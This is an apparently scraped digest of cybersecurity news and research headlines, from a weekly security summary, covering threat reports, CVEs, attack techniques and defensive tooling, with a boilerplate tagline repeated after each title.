State Secrets for Sale: More Leaks from the Chinese Hack-for-Hire Industry
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
Phishing Attack : Deploying Malware on Indian Defense BOSS Linux
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
Statement Regarding Recent Misuse of Shellter Elite and Elastic Security Labs’ Handling
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
The Hard Truths of SOC Modernization
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
Workload identities; from Attack to Defense with Microsoft Security
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
NSB — 國家安全局 National Security Bureau - Taiwan NSB Alerts the Significant Cybersecurity Risks in China-Made Mobile Applications
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
Clickfix / Filefix mitigation
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
CVE-2024-44258: a symlink vulnerability within the ManagedConfiguration framework and the profiled daemon in Apple devices. When restoring a crafted backup, the migration process fails to validate whether the destination folder is a symbolic link (symlink), leading to unauthorized file migration
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
MentalTi: ETW TI parser
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
Dream walkers: Reflective shellcode loaderwith advanced call stack spoofing and .NET support.
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
KQL for Suspicious Browser Child Process or the socially engineered Filefix technique
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
Intune Security Baselines: The Truth Behind the Chaos - "if you created a baseline for 23H2 and deviated from the recommended settings, then the wheels would fall off when upgrading the baseline to 24H2"
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
‘It's Not Paranoia If They're Really After You’: When Announcing Deception Technology Can Change Attacker Decisions
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
PEVuln: a benchmark dataset for using machine learning to detect vulnerabilities in PE malware
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
XWorm's Shape-Shifting Arsenal: Loader and Stager Variants in the Wild
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
RECON-6: query the value of DPCertType. 1 = self-signed and 2 = PKI - 2 is vulnerable to ELEVATE-4
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
ELEVATE-4: Distribution Point Takeover via PXE Boot Spoofing - "An attacker who is able to successfully spoof PXE boot deployment and extract the PKI certificate from the PXE boot variables file contents may gain control of the certificate's AD identity."
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
Identifying and abusing Azure Arc for hybrid escalation and persistence
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
CTO at NCSC Summary: week ending July 6th
This subreddit is for technical professionals to discuss cybersecurity news, research, threats, etc.
CTO at NCSC Summary: week ending July 6th
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
[2506.19453] FuncVul: An Effective Function Level Vulnerability Detection Model using LLM and Code Chunk
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
[2506.20415] SV-LLM: An Agentic Approach for SoC Security Verification using Large Language Models - " The system aims to reduce manual intervention, improve accuracy, and accelerate security analysis, supporting proactive identification and mitigation of risks early in the design cycle. "
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
Azure's Role Roulette: How Over-Privileged Roles and API Vulnerabilities Expose Enterprise Networks - "After reporting this issue to Microsoft, their response was that this is a ‘low severity’ security issue and they decided to not fix it. I later noticed some major documentation changes"
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
Applocker bypass on Lenovo machines – The curious case of MFGSTAT.zip
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
Threat Actors Exploit CVE-2025-3248 to Deliver Flodrix Botnet - CVE-2025-3248 (CVSS 9.8) in Langflow versions prior to 1.3.0, allowing unauthenticated remote code execution- Flodrix botnet is delivered via malicious Python payloads, enabling DDoS attacks and data theft.
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
